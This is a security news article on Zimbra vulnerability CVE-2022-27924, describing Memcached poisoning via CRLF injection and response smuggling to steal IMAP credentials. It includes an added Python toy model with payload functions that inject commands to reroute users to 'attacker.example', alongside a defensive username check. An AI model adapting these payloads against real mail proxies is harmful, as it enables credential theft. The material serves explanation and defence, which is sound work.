Technical details have emerged on a high-severity vulnerability in some versions of the Zimbra email solution that lets attackers steal credentials without authentication or user interaction.
The issue is tracked as CVE-2022-27924 and affects Zimbra releases 8.8.x and 9.x, in both the open-source and the commercial editions.
Zimbra is used by organizations globally, including those in the government, financial, and educational sectors.
In a report from researchers at SonarSource, the flaw is summarized as “Memcached poisoning with an unauthenticated request.” Exploitation relies on a CRLF (carriage return/line feed) injection: the username is inserted unchecked into the key of a Memcached lookup, so newline characters in it let an attacker append their own commands to the request.
Memcached is an internal service that caches key/value pairs for email accounts, improving Zimbra’s performance by minimizing the number of HTTP requests to the Lookup Service. Memcached sets and retrieves those pairs via a simple text-based protocol.
According to the researchers, an attacker can overwrite the IMAP route entry for a known username with a specially crafted HTTP request to a vulnerable Zimbra instance. When the real user next logs in, Zimbra’s Nginx proxy forwards the IMAP session, credentials included, in plain text to a server the attacker controls.
“Usually, Mail clients such as Thunderbird, Microsoft Outlook, the macOS Mail app, and Smartphone mail apps store the credentials that the user used to connect to their IMAP server on disk,” says SonarSource in the report, to explain why no user interaction is needed: the client reconnects with the stored credentials on its own.
This first technique requires the attacker to know the victim’s email address, which is typically easy to find, and the victim to use an IMAP client.
A second exploitation technique removes both restrictions: it steals credentials for any user without any interaction and without any prior knowledge about the Zimbra instance.
This is done via “Response Smuggling,” which relies on the use of Zimbra’s web-based client.
Here the attacker hijacks the proxy connections of random users whose email addresses are unknown: surplus responses injected into the proxy’s Memcached connection are consumed by later lookups for other users, so those users are routed to the attacker. This, too, requires no interaction and raises no alert for the victim.
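To make the two techniques described above concrete, here is an added example (not Zimbra’s or SonarSource’s code) that models a proxy resolving IMAP routes over Memcached’s text protocol with an in-memory stand-in for the server. It shows how a CRLF in the username injects a `set` that rewrites a known user’s route (first technique), how a surplus injected `get` response desynchronizes the connection so the next lookup for an unrelated user receives the attacker’s route (second technique), and the input check that blocks both. The key and value formats (`route:proto=imap;user=<name>` mapping to `host:port`), the host names and the `nobody`/`attacker-planted` names are assumptions made for illustration.

```python
# Added example (not Zimbra's or SonarSource's code). Toy model of a proxy that
# resolves IMAP routes through Memcached's text protocol. The key/value formats
# (route:proto=imap;user=<name> -> host:port) and all names are assumed.
CRLF = "\r\n"


class MemcachedServer:
    """In-memory stand-in that executes requests the way a real server parses them."""

    def __init__(self):
        self.store = {}

    def handle(self, wire: bytes) -> bytes:
        out, pos = b"", 0
        while pos < len(wire):
            end = wire.find(b"\r\n", pos)
            if end == -1:
                raise ValueError("truncated command line")
            parts = wire[pos:end].decode("ascii").split(" ")
            pos = end + 2
            if parts[0] == "set":  # set <key> <flags> <exptime> <bytes> [noreply]\r\n<data>\r\n
                nbytes = int(parts[4])
                self.store[parts[1]] = wire[pos:pos + nbytes]
                pos += nbytes + 2
                if "noreply" not in parts[5:]:
                    out += b"STORED\r\n"
            elif parts[0] == "get":  # get <key>\r\n -> [VALUE <key> <flags> <bytes>\r\n<data>\r\n] END\r\n
                for key in parts[1:]:
                    if key in self.store:
                        val = self.store[key]
                        out += f"VALUE {key} 0 {len(val)}\r\n".encode() + val + b"\r\n"
                out += b"END\r\n"
            else:
                out += b"ERROR\r\n"
        return out


def route_key(username: str) -> str:
    return f"route:proto=imap;user={username}"


def is_valid_username(username: str) -> bool:
    """Hardened check: Memcached keys may not contain whitespace or control characters
    and are capped at 250 bytes. Allowing only printable ASCII without spaces leaves
    no way to terminate the command line early."""
    return len(route_key(username)) <= 250 and all(0x21 <= ord(c) <= 0x7E for c in username)


class RouteProxy:
    """Models the proxy: one persistent connection, exactly one response consumed per
    lookup, and the username interpolated into the key unchecked unless hardened=True."""

    def __init__(self, server: MemcachedServer, hardened: bool = False):
        self.server, self.hardened, self.inbound = server, hardened, b""

    def lookup_route(self, username: str):
        if self.hardened and not is_valid_username(username):
            raise ValueError("username contains characters not allowed in a Memcached key")
        self.inbound += self.server.handle(f"get {route_key(username)}{CRLF}".encode())
        end = self.inbound.index(b"END\r\n") + 5  # consume one get-response, key unchecked
        resp, self.inbound = self.inbound[:end], self.inbound[end:]
        lines = resp.split(b"\r\n")
        return lines[1].decode() if lines[0].startswith(b"VALUE ") else None


def poison_route_payload(victim: str, attacker_route: str) -> str:
    """Technique 1: a 'username' that closes the proxy's get and appends a set for the
    victim's key. 'noreply' keeps the connection in step; the get's own trailing CRLF
    terminates the injected data block."""
    return (f"nobody{CRLF}set {route_key(victim)} 0 0 {len(attacker_route)} noreply"
            f"{CRLF}{attacker_route}")


def smuggle_response_payload(attacker_route: str) -> str:
    """Technique 2: plant a key the attacker controls, then request it. The surplus
    get-response is not consumed by the attacker's own lookup and is handed to
    whichever user the proxy looks up next."""
    planted = route_key("attacker-planted")
    return (f"nobody{CRLF}set {planted} 0 0 {len(attacker_route)} noreply"
            f"{CRLF}{attacker_route}{CRLF}get {planted}")


def demo():
    server = MemcachedServer()
    server.store[route_key("alice")] = b"imap-backend.internal:143"  # constructed legitimate route
    proxy = RouteProxy(server)
    proxy.lookup_route(poison_route_payload("alice", "attacker.example:143"))
    hijacked_alice = proxy.lookup_route("alice")  # alice now routed to the attacker
    proxy.lookup_route(smuggle_response_payload("attacker.example:143"))
    hijacked_bob = proxy.lookup_route("bob")  # bob was never named by the attacker
    return hijacked_alice, hijacked_bob
```

Both payloads fail `is_valid_username`, so `RouteProxy(server, hardened=True)` refuses them before anything reaches Memcached. The model deliberately reproduces two weaknesses a practitioner should look for in their own proxies: untrusted input interpolated into a line-oriented protocol, and responses matched to requests by position alone rather than by key.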
Zimbra fixed the flaw in ZCS 9.0.0 Patch 24.1 and ZCS 8.8.15 Patch 31.1, which have been available since May 10, 2022.